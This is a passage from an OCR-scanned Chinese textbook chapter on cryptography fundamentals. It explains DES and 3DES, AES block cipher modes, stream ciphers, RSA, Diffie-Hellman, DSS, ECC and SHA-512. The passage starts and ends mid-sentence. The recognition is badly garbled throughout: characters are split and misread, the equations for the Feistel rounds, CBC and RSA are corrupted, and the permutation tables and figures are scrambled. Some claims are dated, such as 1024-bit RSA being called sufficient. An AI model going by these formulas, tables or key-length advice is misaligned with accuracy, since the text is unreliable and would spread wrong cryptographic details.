密 钥 文件 密 钥 等 。 会 话 密 钥 可 以 由 密 钥 管理 中 心 分 配 , 也 可 以 通信 双方 协商 获取 。 会 话 
密 钥 的 生命 周期 很 短 ,在 通信 结束 后 ,该 密 钥 即 被 销毁 。 


9.2 加 /解密 技术 


9.2.1 对 称 加 密 


对 称 加 密 也 称 常 规 加 密 和 单 钥 加 密 , 在 1976 年 公 钥 加 密 出 现 之 前 ,是 唯一 被 使 用 的 
加 密 类 型 。 对 称 加 密 的 加 密 密 钥 与 解密 密 钥 相 同 或 者 相互 之 间 很 容易 推算 ,通信 双方 必 
须 在 安全 通信 之 前 协商 好 密 钥 ,然后 才能 用 该 密 钥 对 数据 进行 加 密 和 解密 ,整个 通信 安全 
完全 依赖 于 密 钥 的 安全 ,其 通信 过 程 如 图 9-1 所 示 ,P 表示 明文 ,Y 表示 密 文 , 收 发 双 发 密 
钥 均 为 K ,满足 P= 二 Decryption(K ,Encryption(K,P))。 


对 称 加 密 分 为 分 组 加 密 和 流 加 密 两 ， 2 
种 形式 ,最 常用 的 对 称 加 密 方法 是 分 组 人 多 | 
加 密 。 分 组 加 密 将 明文 分 成 若干 同等 大 网 | 有 
小 的 分 组 ,对 每 个 分 组 分 别 进行 加 密 , 产 ACEO 
生 同 等 大 小 的 密 文 分 组 。 分 组 加 密 的 算 
法 代表 有 DES、3DES 和 AES。 

1. DES 

最 为 广泛 使 用 的 加 密 方案 是 数据 加 密 标准 (DES) ,由 IBM 公司 于 1972 年 研制 ,美国 
国家 标准 局 (NIST) 于 1977 年 采用 。DES 算法 的 分 组 长 度 为 64 比特 , 密 钥 长 度 为 56 比 
特 。DES 采用 16 轮 迁 代 , 每 轮 迁 代 从 原始 密 钥 中 产生 一 组 子 密 钥 。DES 的 解密 过 程 和 
加 密 过 程 相 同 , 但 是 子 密 钥 的 使 用 顺序 与 加 密 时 相反 。DES 密 钥 空间 只 有 2”, 约 为 
7.2X10* 个 密 钥 ,假设 计算 机 能 够 1s 做 1 万 亿 次 解密 , 则 在 10h 内 可 以 穷 举 密 钥 空间 ,而 
中 国 的 “太湖 之 光 ” 超 级 计算 机 已 经 每 秒 钟 能 够 计算 10 亿 亿 次 。 

DES 采用 Feistel 分 组 密码 设计 结构 , 它 的 最 大 优点 是 容易 保证 加 /解密 的 相似 性 , 它 
使 用 简单 的 乘积 来 近似 表达 大 尺寸 的 替换 ,通过 交替 使 用 蔡 换 和 轩 换 ,实现 混淆 和 扩散 。 
DES 计算 时 使 用 的 密 钥 长 度 为 64 位 ,只 是 每 个 字 节 的 第 8 位 都 是 奇偶 校 验 位 ,因此 实际 
密 钥 长 度 为 56 位 。 

DES 算法 步骤 包括 IP 置换 、 密 钥 置 换 选 择 . 迁 代 函数 下 和 逆 IP 置换 (图 9-2)。 在 IP 
喔 换 后 进行 16 轮 相同 的 迭代 操作 ,每 轮 迭 代 中 64 位 明文 分 成 两 份 独立 的 32 位 明文 , 左 
边 工 ; ,右边 R;, 每 轮 变 换 过 程 为 L; 二 Ri;-_1,R; 二 Li;-1 外 F(R;-1,K;), 其 中 函数 下 包括 EE 
扩展 置换 、S 盒 代替 、P 盒 置 换 。 











图 9-1 对 称 加 密 通信 过 程 
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输入 64 位 明文 
IP 置 换 表 56 位 密 钥 
量 | 1 
Lo Ro 置换 选择 1 
| 1 
Li=Ro Ri=LoBF(Ro. 以 ) -| 置换 选择 2 -1 循环 左 移 
LR R=LI@F(RI,K2) ”一 一 一 置换 选择 2 | 循环 左 移 
SS 和 al 
| 
Lis=Ris Ris=Lu@FRs, Kis) PO 置换 选择 2 | 循环 左 移 
Lie=Ris Rie=L1s®F(Rs, Ko) 
,| IP 逆 置换 | 
输出 64 位 密 文 
图 9-2 DES 算 法 框架 
1) IP 置换 


IP 置换 目的 是 将 输入 的 64 位 数据 块 按 位 重新 组 合 ,并 把 输出 分 为 Lo .Rs 两 部 分 ,每 
部 分 为 32 位 ,置换 规则 如 图 9-3 所 示 。 图 中 的 数字 代表 原 数据 中 此 位 置 的 数据 在 新 数据 
中 的 位 置 , 即 原 数据 块 的 第 1 位 放 到 新 数据 的 第 58 位 ,第 2 位 放 到 第 50 位 , 依 此 类 推 ,第 
64 位 放 到 第 7 位 。 置 换 后 的 数据 分 为 Lu 和 R, 两 部 分 ,L。 为 新 数据 的 左 32 位 ,Ru 为 新 数 
据 的 右 32 位 。 该 置换 对 DES 的 安全 性 没有 改善 ,只 是 使 计算 花费 更 长 时 间 。 

2) 密 钥 置换 

输入 的 64 位 密 钥 除 去 每 个 字 节 的 第 8 位 , 变 为 56 位 密 |58|50|42|34|26|18|10 
钥 ( 注 意图 9-4 中 没有 8、16、24、32、40、48、56、64) ,然后 经 过 |@@| 了 44|36|128120|22 
置换 选择 1( 图 9-4)。 接 着 对 于 每 一 轮 迭 代 , 将 56 位 密 钥 分 [52154146138|30 122 14 
成 左右 两 部 分 ,每 部 分 循环 左 移 1 或 2 位 后 (图 9-5) ,再 进行 [el36148140|32124116 
置换 选择 2( 图 9-6), 从 中 取出 48 位 子 密 钥 作为 此 轮 园 代 的 全 lh 
加 密 密 钥 。 虽然 每 轮 的 堂 换 选择 表 相同 ,但 是 由 于 密 钥 位 置 | 有 | 
重复 闪 代 ,所 以 每 轮子 密 钥 并 不 相同 。 在 这 个 过 程 中 , 既 置 Glsso lala [als 
换 了 每 位 的 顺序 又 选择 了 子 密 钥 , 因 此 置换 选择 2 也 称 为 压 
缩 置换 。 
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9-3 初始 IP 置换 
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57|49|41|33|25|i7|9| 
58|50|42|34|26|ig|io| 2 re rn Ey ee 
s9|s1|43|35|27|19|1|3 吐 周 出 责 压 恒 靖 后 
60|52|44|36| 6 |55|47|39 el 
31|23|15| 7 |62|54|46|38 41|52|31|37|47|55|30|40 
30|22|14| 6 | 6l| 53|45| 37 51|45|33|48|44|49|39|56 
29|21|13| 5 |28|20|12| 4 34|53|46|42|50|36|29|32 
图 9-4 子 密 钥 置换 选择 1 图 9-5 子 密 钥 置换 选择 2 
轮 数 | 1|2|3|4|5|s|7|s|* ilulazlalalslu 
5 加 | 国 加 加 加 加 加 加 而 加 加 加 加 回国 区 









































图 9-6 16 轮子 密 钥 的 循环 左 移 表 


3) 和 迭代 函数 下 

函数 下 的 运算 过 程 如 图 9-7 所 示 ,首先 通过 已 扩 展 置 换 将 右 半 部 分 扩展 为 48 位 ,与 
48 位 子 密 钥 异 或 后 ,将 48 位 数据 分 为 8 组 ,每 组 6 位 。 每 组 数据 单独 进行 S 盒 蔡 换 运 
算 , 每 个 S 盒 将 6 位 数据 换 成 4 位 数据 输出 ,最 后 对 8 组 4 位 数据 进行 己 置 换 , 产 生 最 终 
结果 F(Ri-1 ,Ki)。 


32 位 Ri-i 











图 9-7 迭代 函数 下 运算 过 程 


已 扩展 置换 表 如 图 9-8 所 示 ,实际 上 是 将 32 位 数据 转换 成 8 个 分 组 ,每 个 分 组 4 位， 
对 于 每 组 数据 ,分别 从 相 邻 分 组 中 取 靠 近 的 1 位 ,将 本 组 4 位 扩展 为 6 位。 一 个 S 盒 就 是 
一 个 4X16 的 矩阵 ,S 盒 中 的 每 一 项 都 是 一 个 4 比特 数据 。6 位 输入 数据 确定 该 数据 对 应 
的 输出 在 哪 一 行 和 哪 一 列 , 输 入 的 首尾 两 位 作为 行 号 ,中 间 4 位 作为 列 号 , 行 号 列 号 从 0 
开始 索引 ,输出 相应 行 和 列 的 4 比特 数据 。 对 于 图 9-9 所 示 的 S 盒 ,如 果 输 入 是 
“100001”, 那 么 寻找 第 4 行 和 第 1 列 的 数字 ,输出 *1111”(15)。S 盒 替 换 是 DES 算法 的 
关键 步骤 ,所 有 其 他 的 运算 都 是 线性 的 ,而 S 盒 蔡 换 是 非 线性 的 。 
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图 9-8 EE 扩展 置换 表 图 9-9 S 盒 示例 


S 盒 的 32 位 输出 按照 已 盒 进行 置换 ,置换 表 如 图 9-10 所 示 , 表 中 数字 代表 S 盒 输出 
的 数据 位 置 ,如 原 数据 的 16 位 放置 放 到 新 数据 的 第 1 位 。 忆 盒 置换 的 结果 与 最 初 的 64 
位 分 组 左 半 部 分 Lo 异 或 ,然后 左右 部 分 交换 ,接着 开始 另 一 轮 迭 代 。 

4) IP 逆 置 换 

它 是 初始 IP 置换 的 道 过 程 ,DES 经 过 16 轮 迭 代 后 ,左右 两 部 分 并 不 进行 交换 ,而 是 
合并 形成 一 个 分 组 作为 IP 逆 置 换 的 输入 ,置换 规则 表 如 图 9-11 所 示 。 















































图 9-10 尸 盒 置换 图 9-11 JIP 逆 置 换 


2. 3DES 

3DES 在 1999 年 成 为 DES 的 一 部 分 , 它 使 用 3 个 密 钥 并 执行 三 次 DES 算法 ,组 合 过 
程 按照 加 密 一 解密 一 加 密 的 顺序 进行 ,如 图 9-12 所 示 , 执行 : C= Encryption (K;， 
Decryption(K: ,Encryption (Ki,P))), 解 密使 用 相反 的 密 钥 顺序 进行 相同 操作 ,执行 
P= 二 Decryption( Ki ,Encryption(K, ,Decryption(K;,C)))。 第 二 步 使 用 的 解密 没有 密码 
方面 的 意义 , 仅 用 于 解密 原来 单 重 DES 加 密 的 数据 。 使 用 3 个 不 同 的 密 钥 ,3DES 的 有 效 
密 钥 长 度 为 168 比特 ,也 可 以 让 Ki 等 于 K; ,使 密 钥 长 度 变 为 112 比特 ,3DES 算法 的 密 
钥 长 度 已 经 足够 使 得 穷 举 攻击 无 法 奏效 。 

3. AES 

3DES 算法 的 缺陷 在 于 : 运算 速度 较 慢 ,因为 3DES 迭代 的 轮 数 是 DES 的 3 售 ; 
@ 分 组 较 小 ,只 有 64 比特 。1997 年 ,NIST 公开 征集 新 的 高 级 加 密 标 准 , 要 求 它 与 3DES 
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图 9-12 3DES 算法 


有 着 相同 或 者 更 高 的 安全 强度 ,并 且 效 率 有 显著 提高 ,要 求 分 组 必须 为 128 比特 ,支持 密 
钥 长 度 为 128、192 和 256 比特 ,最 终 选 择 来 自 比 利 时 的 密码 学 家 Joan Deamen 博士 和 
Vincent Rijmen 博士 提交 的 Rijndael 作为 AES 算法 标准 。 

分 组 加 密 一 次 处 理 一 个 分 组 ,对 于 DES 和 3DES 算法 ,每 个 分 组 64 比特 ,而 对 于 
AES 算 法 ,每 个 分 组 128 比特 ,将 较 长 的 明文 分 割 为 多 个 分 组 时 ,如 果 最 后 一 个 分 组 不 够 
64 或 128 比特 ,必须 要 进行 填充 。NIST 规定 了 分 组 加 密 的 5 种 工作 模式 ,分 别 是 电子 密 
码 本 (Electronic Codebook ,ECB) 密码 分 组 链接 (Cipher Block Chaining,CBC) 、 密 码 反 
馈 (Cipher Feedback, CFB)、 计数 器 (Counter, CTR) 和 输出 反馈 (Output Feedback， 
OFB) ,图 9-13 和 图 9-14 分 别 给 出 ECB 和 CBC 模式 的 示意 图 。 


























人 | 加 密 | 一 加 密 | 二 | 加密 
1c 1c Io 
图 9-13 ECB 模 式 
1) ECB 模式 
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9-14 ”CBC 模式 


将 明文 分 成 若干 相同 的 分 组 ,对 每 个 分 组 使 用 相同 的 密 钥 加 密 , 如 果 某 个 分 组 在 明文 
中 出 现 多 次 ,那么 对 应 的 密 文 分 组 也 会 在 密 文中 出 现 同 样 次 数 。 密 码 分 析 者 可 以 根据 这 
种 对 应 关系 的 规律 破解 相应 分 组 并 得 到 很 多 明文 和 密 文 对 ,为 破解 密 钥 提供 帮助 。 


2) CBC 模式 


加 密 算法 的 输入 是 当前 明文 分 组 与 前 一 个 密 文 分 组 的 异 或 结果 ,相当 于 将 明文 分 组 
序列 的 处 理 链 接 在 一 起 。 每 个 明文 分 组 的 加 密 函 数 的 实际 输入 和 明文 分 组 之 间 的 关系 不 
固定 ,因此 类 似 ECB 的 重复 模式 不 会 出 现 。 解 密 时 ,用 解密 算法 依次 处 理 每 个 分 组 ,然后 
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将 结果 与 前 一 个 密 文 分 组 进行 异 或 ,产生 明文 分 组 。 为 了 产生 第 一 个 密 文 分 组 ,需要 指定 
初始 向 量 (IV) 和 第 一 个 明文 分 组 异 或 ,解密 时 ,将 IV 和 解密 算法 的 输出 进行 异 或 来 恢复 
第 一 个 明文 分 组 。 通 信 双 方 都 必须 知道 IV, 为 了 提高 安全 性 ,可 以 采用 ECB 模式 对 IV 
进行 加 密 传送 ,CBC 的 加 /解密 运算 的 形式 化 描述 如 下 : 

C= E(Cn@P), C= EGGV 田 P) 

Di(Y) = Di(E(Yi 田 PD)) = YP,, 

Yi @ DY) = Yn BY 田 P = P,, 

Pi=1V® DY) 

分 组 加 密 每 次 处 理 一 个 输入 分 组 ,产生 一 个 输出 分 组 。 流 加 密 连 续 处 理 输入 元 素 ,在 
运行 过 程 中 ,一 次 产生 一 个 元 素 。 针 对 某 些 特定 的 应 用 ,使 用 流 密 码 更 加 合适 。 当 前 最 流 
行 的 流 加 密 方法 是 RC4。 典 型 的 流 加 密 一 次 加 密 一 个 字 节 的 明文 ,但 是 也 可 以 一 次 操作 
一 个 比特 或 者 比 字 节 大 的 单位 。 图 9-15 是 流 加 密 的 典型 结构 ,双方 的 共同 初始 密 钥 作为 
伪 随 机 字 节 生成 器 的 种 子 ,产生 一 个 伪 随 机 的 字 节 流 ,该 字 节 流 称 为 密 钥 流 , 使 用 异 或 操 
作 与 明文 流 结合 ,一 次 一 个 字 节 ,收发 双方 生成 的 密 文 流 相同 。 

密 钥 K 密 铀 K 


伪 随 机 字 节 产生 器 
( 密 钥 流 产生 器 ) 


明文 字 节 
流 P 





伪 随 机 字 节 产生 器 
( 密 钥 流产 生 器 ) 


密 文字 节 明文 字 节 
流 C -+) 流 P 


图 9-15 流 密码 结构 图 


设计 流 加 密 时 需要 考虑 的 主要 因素 包括 : 

(1) 密 钥 流 应 该 有 一 个 较 长 的 周期 。 伪 随机 数 产生 器 生成 的 实际 上 是 一 个 不 断 重复 
的 比特 流 , 这 个 重复 的 周期 越 长 ,破解 就 越 困 难 。 

(2) 密 钥 流 应 该 尽 可 能 接近 真实 随机 数 流 的 性 质 。 如 果 将 密 钥 流 看 作 字 节 流 ,那么 
字 节 的 256 种 可 能 值 出 现 的 频率 应 该 近似 相等 。 密 钥 流 表现 得 越 随机 ,破解 就 越 困 难 。 

(3) 伪 随 机 数 生成 器 的 输出 受到 输入 密 钥 值 的 控制 。 为 了 防御 穷 举 攻击 ,初始 的 输 
入 密 钥 必须 非常 长 ,需要 至 少 128 位 比特 长 度 的 密 钥 。 

如 果 伪 随机 数 生成 器 设计 合理 , 当 密 钥 长 度 相同 时 , 流 加 密 和 分 组 加 密 的 安全 性 相 
当 , 但 是 流 加 密 速度 更 快 ,实现 更 简单 。 流 加 密 适合 于 需要 加 /解密 数据 流 的 应 用 ,如 数据 
通信 信道 或 HTTP 链 路 。 而 对 于 处 理 数据 分 组 的 应 用 ,如 文件 传递 .电子 邮件 等 ,分 组 加 
密 更 加 合适 。 


9.2.2 公 钥 加 密 
公 钥 加 密 是 密码 学 发 展 历史 上 最 伟大 的 革命 ,在 此 之 前 ,所 有 的 密码 算法 都 基于 置换 
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和 替换 两 种 工具 ,而 公 钥 加 密使 用 的 基本 工具 是 数学 函数 。 而 且 , 由 于 它 是 不 对 称 加 密 ， 
使 用 两 个 独立 的 密 钥 ,很 好 地 解决 了 密 钥 分 配 和 数字 签名 的 问题 。 

有 关公 钥 加 密 ,初学 者 会 存在 一 些 常见 的 误解 : 

(1) 公 钥 加 密 比 对 称 加 密 更 加 安全 。 实 际 上 ,任何 加 密 机 制 的 安全 性 都 取决 于 密 钥 
长 度 和 破解 密 钥 所 需 的 计算 量 。 

(2) 公 钥 加 密 是 一 种 通用 技术 ,对 称 加 密 已 经 过 时 。 实 际 上 ,由 于 公 钥 加 密 计算 开销 
太 大 ,无 法 取代 对 称 加 密 。 

(3) 对 称 加 密 需 要 与 密 钥 分 配 中 心 实现 握手 协议 来 获取 初始 密 钥 ,而 公 钥 加 密 分 配 
密 钥 十 分 简单 。 实 际 上 , 公 钥 密 钥 也 需要 某 种 形式 的 协议 ,常常 需要 中 心 代理 ,因此 , 公 铀 
加 密 进行 密 钥 分 配 时 并 不 简单 或 高 效 。 

公 钥 加 密 结构 与 对 称 加 密 不 同 之 处 在 于 加 密 和 解密 使 用 两 个 不 同 的 独立 密 钥 进行 ， 
两 个 密 钥 分 别称 为 公 钥 和 私 钥 。 公 钥 可 以 公开 提供 给 其 他 人 使 用 ,而 只 有 自己 才 知 道 私 
钥 , 使 用 其 中 一 个 密 钥 进行 加 密 , 另 一 个 密 钥 进 行 解密 。 公 和 钥 加 密 的 基本 步骤 如 下 : 

(1) 每 个 用 户 都 生成 一 对 密 钥 用 来 对 消息 加 /解密 。 

(2) 每 个 用 户 把 两 个 密 钥 的 一 个 放 在 可 公开 的 机 构 或 文件 中 ,这 个 密 钥 就 是 公 钥 , 另 
一 个 密 钥 自己 保存 。 每 个 用 户 都 可 以 收集 其 他 人 的 公 钥 。 

(3) 如 果 用 户 了 看望 给 用 户 A 发 送 加 密 消息 ,B 可 以 使 用 A 的 公 钥 进行 加 密 。 

(4) 当 A 收 到 这 条 消息 时 ,他 使 用 自己 的 私 钥 进行 解密 ,因为 只 有 A 才 知 道 自己 的 
私 钥 , 所 以 其 他 收 到 消息 的 人 无 法 解密 消息 。 

采用 公 钥 加 密 方法 ,任何 人 都 可 以 获得 其 他 人 的 公 钥 ,由 于 私 钥 由 每 个 参与 者 自行 产 
生 , 因 此 不 需要 进行 密 钥 分 配 ,只 要 用 户 的 私 钥 安 全 ,那么 用 户 与 其 他 人 的 通信 就 是 安全 
的 。 图 9-16 给 出 的 公 钥 加 密 结构 基于 两 个 关联 密 钥 的 加 密 算法 , 公 钥 算法 必须 满足 如 下 
条 件 : 

(1) 通信 双方 都 容易 计算 密 钥 对 (PK ,SK)。 

(2) 已 知 公 钥 和 需要 加 密 的 消息 P 时 ,发 送 方 容易 进行 加 密 运算 Encryption (PK， 
P) ,生成 相应 的 密 文 C。 

(3) 接收 方 使 用 私 钥 解密 密 文 C 时 , 比较 容易 通过 计算 Decryption(SK， 
Encryption(PK,P) ) 恢 复 消 息 P。 

(4) 攻击 者 已 知 公 钥 PK ,不 可 能 通过 计算 推导 出 私 钥 SK 。 

(5) 攻击 者 在 已 知 公 钥 PK 和 密 文 C 的 情况 下 ,通过 计算 不 可 能 恢复 原始 消息 P。 
























































明文 P 加 密 密 文 C 解密 明文 P ”明文 | 加密 密 文 C 解密 |。 
Encryption Decryption Encryption Decryption 
公 钥 PK | 私 钥 SK 私 钥 SK 公 钥 PK 
C=Encryption(PK, P) C=Encryption(SK. P) 
P=Decryption(SK, C) P=Decryption(PK. C) 
(a) 加 密 (b) 认证 


9-16 ” 公 钥 加 密 结构 图 


第 9 章 “密码 技术 基础 


(6) 两 个 相关 密 钥 中 的 任何 一 个 都 可 以 用 于 加 密 ,另外 一 个 用 于 解密 。 

公 钥 加 密 方法 通常 有 三 类 主要 应 用 : 

(1) 加密 /解密 : 发 送 方 使 用 接收 方 的 公 钥 加 密 消 息 。 

(2) 数字 签名 : 发 送 方 用 自己 的 私 钥 对 消息 加 密 (签名 )。 把 加 密 算法 作用 于 消息 或 
者 消息 摘要 的 一 小 块 数据 ,就 实现 了 对 消息 的 签名 。 

(3) 密 钥 交换 : 通信 双方 根据 某 种 协议 交换 会 话 密 钥 。 

有 的 公 钥 加 密 算法 同时 适用 于 这 三 种 应 用 ,而 有 的 算法 仅 适用 于 其 中 的 一 种 或 两 种 ， 
如 表 9-2 所 列 。 

表 9-2 公 和 钥 加 密 算法 的 应 用 














算 法 加 密 /解密 数字 签名 密 钥 交换 
RSA 是 是 是 
Diffie-Hellman 否 否 是 
DSS 否 是 否 
椭圆 曲线 是 是 是 














1. RSA 公 钥 加 密 算法 

最 初 的 公 钥 方案 RSA 是 1977 年 由 Ron Rivest、Adi Shamir 和 Leonard Adleman 在 
MIT 开发 ,成 为 现在 最 广泛 接受 的 公 钥 加 密 方法 。RSA 是 分 组 加 密 , 对 于 某 个 自然 数 nn， 
它 的 明文 和 密 文 是 0 一 一 1 之 间 的 某 个 整数 。 

对 于 明文 分 组 P 和 密 文 分 组 C,RSA 的 加 密 和 解密 形式 如 下 : 

C = 了 mod7 
P= Cimodn= (P)’‘modn= P” modn 

发 送 方 和 接收 方 都 必须 知道 n 和 e 的 值 ,并 且 只 有 接收 方 知道 d 的 值 。RSA 的 公 钥 
PK==(e,n), 私 钥 SK 二 (d,n)。 为 了 该 算法 能 够 满足 公 钥 加 密 要 求 , 必 须 满 足下 列 条 件 : 

(1) 可 以 找到 e,d,n 的 值 ,使 得 对 所 有 的 M 二 n,M” 二 M modn 成立; 

(2) 对 所 有 满足 M=n 的 值 ,计算 Mr 和 C* 相 对 容易 ; 

(3) 给 定 e 入 ,不 可 能 推导 出 d。 

前 两 个 要 求 很 容易 满足 , 当 e 和 取 很 大 的 值 时 ,第 三 个 要 求 也 能 够 满足 。 

RSA 的 算法 过 程 具体 如 下 : 

(1) 选择 两 个 很 大 的 素数 p 和 g ,计算 它们 的 乘积 作为 加 密 和 解密 的 模 ; 

(2) 计算 nn 的 欧 拉 函 数值 $8(n) 二 (p 一 1)(g 一 1) ,表示 小 于 nn 并 且 与 n 互 素 的 正 整 数 
的 个 数 ; 

(3) 选择 整数 e,e 二 n 并 且 e 与 %(z) 互 素 , 即 gcd(e,$(n)) 二 1; 

(4) 计算 d, 它 是 e 关 于 模 %(z) 的 乘法 逆 元 , 即 de mod $(n) 一 1。 

存在 两 种 可 能 攻击 RSA 的 方法 ,一 是 穷 举 攻击 ,尝试 所 有 的 私 钥 , 所 以 e 和 的 值 越 
大 ,算法 越 安全 ,但 是 密 钥 太 长 会 导致 计算 量 太 大 ; 二 是 通过 因 式 分 解 为 两 个 素数 ,但 
是 当 p 和 g 很 大 时 , 因 式 分 解 问题 十 分 困难 ,目前 一 般 采 用 1024( 大 约 300 位 十 进 制 数 )、 
2048 或 4096 比特 的 密 钥 ,如 此 长 度 的 密 钥 对 于 当今 所 有 应 用 可 以 认为 强度 足够 。 
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2. Diffie-Hellman 密 钥 交 换 

它 是 首 个 公开 发 表 的 公 钥 算法 ,目的 是 使 得 两 个 用 户 能 够 安全 地 交换 密 钥 , 供 以 后 加 
密 消息 使 用 。 该 算法 只 能 用 于 密 钥 交换 , 它 建立 在 离散 对 数 的 计算 复杂 性 基础 之 上 。 

定义 9-1 一 个 素数 p 的 本 原 根 是 一 个 数 a ,满足 a 的 智能 够 生成 1~p 一 1 的 所 有 整 
数 , 即 

a mod pa’ mod 户 , :az modp 
各 不 相同 , 即 组 成 了 1~p 一 1 整数 的 某 种 排列 。 

定义 9-2 对 于 任意 小 于 p 的 整数 b 和 pp 的 本 原 根 a ,如 果 能 够 找到 唯一 的 指数 i 

使 得 
b= 二 aimod p， 其 中 0 三 i 过 (p 一 1) 
则 称 i 是 6 的 基 为 a 模 为 p 的 离散 对 数 , 记 为 dlogs,s (5)。 

密 钥 交换 算法 的 具体 过 程 如 下 : 

(1) 选择 两 个 公开 的 数值 ,素数 g 和 g 的 本 原 根 a; 

(2) 假设 A 和 B 希 望 交 换 密 钥 ,A 选择 一 个 小 于 4 的 随机 整数 XA ,计算 YA 二 wx 
mod dg, 相似 地 ,B 也 选择 一 个 小 于 g 的 随机 整数 Xe, 计算 Ys 二 a*s mod gq; 

(3) A 和 B 都 将 X 值 作为 私 钥 , 向 对 方 公开 Y 值 ; 

(4) A 计算 密 钥 尺 二 (Ys)*s mod g,B 计算 密 钥 开 王 (YA)xa mod gq, 双 方 计 算得 到 的 
密 钥 KK 相同 ,因为 (Ye)xA modg 二 (Caxs mod g)xA mod gq = (axa)xA mod g = (a*s)*s 
modg = (a*s mod g)*s mod g =(Ya)*s mod g。 

这 样 双 方 就 交换 了 密 钥 , 因 为 XA 和 Xs 为 私 钥 , 攻 击 者 只 能 利用 g、a、Y 和 和 Ys 进行 攻 
击 ,因此 攻击 者 必须 获取 离散 对 数 来 确定 密 钥 ,例如 Xs= dlogs,,(Ys)。 整 个 算法 的 安全 
性 在 于 ,虽然 计算 模 寡 运算 相对 容易 ,但 是 计算 离散 对 数 十 分 困难 ,对 于 很 大 的 素数 ,计算 
离散 对 数理 论 上 不 可 行 。 

3. 数字 签名 标准 DSS 

DSS 是 NIST 于 1991 年 发 布 的 数字 签名 标准 ,提出 了 一 种 新 的 数字 签名 技术 , 即 数 
字 签 名 算法 (DSA) 。 它 是 专门 为 数字 签名 而 设计 的 算法 ,与 RSA 不 同 , 它 不 能 用 来 加 密 
或 者 进行 密 钥 交换 。 

4. 椭圆 曲线 密码 ECC 

相对 于 RSA ,ECC 的 优点 在 于 它 只 需要 非常 少 的 密 钥 比 特 就 可 以 提供 相同 强度 的 安 
全 性 ,从 而 减轻 了 计算 开销 。 它 使 用 了 基于 椭圆 曲线 数学 结构 的 理论 。 


9.2.3 ” 散 列 函数 


散 列 函 数 的 目的 是 为 文件 、 消 息 或 其 他 数据 块 产生 “指纹 ”, 主 要 用 于 消息 认证 、 完 整 
性 检测 和 数字 签名 。 一 个 散 列 函数 互 必须 具有 以 下 性 质 : 

(1) 适用 于 任意 长 度 的 数据 块 ; 

(2) 能 够 产生 固定 长 度 的 输出 ; 

(3) 对 于 任意 给 定 的 zx, 计算 有 (zx) 相 对 容易 ,可 以 使 用 软件 或 硬件 实现 ; 

(4) 对 于 任意 给 定 的 值 及 ,找到 满足 也 (zx) 二 h 的 z 值 在 计算 上 不 可 行 ,满足 该 性 质 
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的 散 列 函数 称 为 具有 单 向 性 ; 


(5) 对 于 任意 给 定 的 数据 块 x, 找到 满足 瓦 (>) 三 互 (z) ,并 且 yz 的 y 在 计算 上 不 
可 行 ,满足 这 一 特性 的 散 列 函 数 称 为 具有 抗 弱 碰撞 攻击 性 ; 

(6) 找到 满足 及 (x) 二 HH(y) 的 任意 一 对 (z,y) 在 计算 上 不 可 行 ,满足 这 一 特性 的 散 
列 函 数 称 为 具有 抗 碰 撞 性 。 

性 质 (1) 一 (3) 是 使 用 散 列 函 数 进 行 消息 认证 的 必需 性 质 , 单 向 性 保证 了 在 对 给 定 消 
息 产生 散 列 码 后 ,不 可 能 从 散 列 码 中 恢复 原始 消息 ,提供 了 保密 性 ; 抗 弱 碰 撞 攻 击 性 保证 
了 对 于 给 定 消息 ,不 可 能 具有 相同 散 列 值 的 可 替换 消息 , 即 可 防止 纂 改 ,提供 了 完整 性 。 
满足 前 5 个 性 质 的 散 列 函 数 称 为 弱 散 列 函 数 , 如 果 同 时 满足 第 6 个 性 质 , 则 称 为 强 散 列 
函数 。 

所 有 的 散 列 函数 都 把 输入 消息 看 作 是 一 个 比特 分 组 的 序列 ,输出 是 比特。 当前 ， 
应 用 最 广泛 的 散 列 函数 是 安全 散 列 函 数 (SHA), 由 NIST 在 1993 年 推出 ,其 他 散 列 函数 
都 已 经 被 证 实 存在 密码 分 析 的 缺陷 ,常用 的 版 本 是 SHA-1 和 SHA-2,SHA-1 生成 散 列 码 
长 度 为 160 比特 ,SHA-2 包含 三 种 散 列 码 长 度 ,分 别 是 256、384 和 512, 又 称 为 SHA- 
256、SHA-384 和 SHA-512, 表 9-3 列 出 了 它们 的 参数 比较 。 


表 9-3 SHA 参数 的 比较 




















其 列国 数 SHA-1 SHA-256 SHA-384 SHA-512 

参数 

散 列 码 长 度 160 256 384 512 
消息 大 小 2 a < < 
分 组 大 小 512 512 1024 1024 
字 大 小 32 32 64 64 
执行 的 迭代 轮 数 80 64 80 80 
穷 举 次 数 280 2128 2192 2256 














SHA-512 算法 以 最 大 长 度 为 2” 比 特 的 消息 作为 输入 ,生成 512 比特 的 散 列 码 输出 ， 
将 消息 分 成 1024 比特 的 分 组 进行 处 理 , 图 9-17 描述 算法 的 整个 过 程 ,包括 以 下 步 又 : 

(1) 追加 填充 比特 。 填 充 消息 使 得 其 长 度 模 1024 余 896, 填 充 的 值 是 比特 1 后 面 跟 
若干 个 比特 0。 

(2) 追加 长 度 。 将 128 比特 的 数据 块 追加 在 消息 尾部 ,该 块 被 看 作 128 比特 的 无 符 
号 整数 , 它 包 含 原 始 消 息 的 长 度 。 这 两 个 步 又 使 得 消息 变 为 1024 的 整数 倍 。 

(3) 初始 化 散 列 缓冲 区 。 用 512 比特 的 缓冲 区 保存 散 列 函 数 的 中 间 结 果 和 最 终结 
果 , 缓 冲 区 可 以 是 8 个 64 位 寄存 器 ,这 些 寄存 器 被 初始 化 为 固定 的 64 比特 整数 , 取 自 前 
8 个 素数 的 平方 根 的 小 数 部 分 的 前 64 比特 。 

(4) 处 理 1024 比特 的 分 组 。 算 法 核心 是 80 轮 选 代 构 成 的 模块 (图 9-18): 

QO 每 一 轮 以 512 比特 缓冲 区 值 作为 输入 ,更 新 缓冲 区 的 内 容 ; 

@ 在 第 一 轮 的 输入 端 ,缓存 上 一 个 分 组 (第 ;一 1 个 分 组 ) 的 散 列 值 HF; ; 

@ 在 任意 第 上 轮 ,使 用 从 当前 分 组 M; 获 得 的 64 比特 字 W,, 以 及 某 个 常数 K,， 
K,(0 达 1 过 79) 取 自前 80 个 素数 的 立方 根 的 小 数 部 分 的 前 64 比特 ,K, 用 来 随机 化 64 位 比 
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图 9-18 SHA-512 处 理 单个 1024 比特 分 组 
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特 模 式 , 消 除 输 入 数据 中 的 任何 规律 性 ; 

@ 80 轮 后 输出 该 分 组 的 散 列 值 瓦 ; ,再 与 瓦 ;-: 进 行 模 2* 相 加 。 

(5) 输出 。 当 所 有 分 组 都 处 理 完毕 后 ,就 产生 最 终 512 比特 的 散 列 码 。 

SHA-512 算法 使 得 散 列 码 的 任意 比特 都 是 输入 消息 中 每 个 比特 的 函数 ,基本 函数 下 
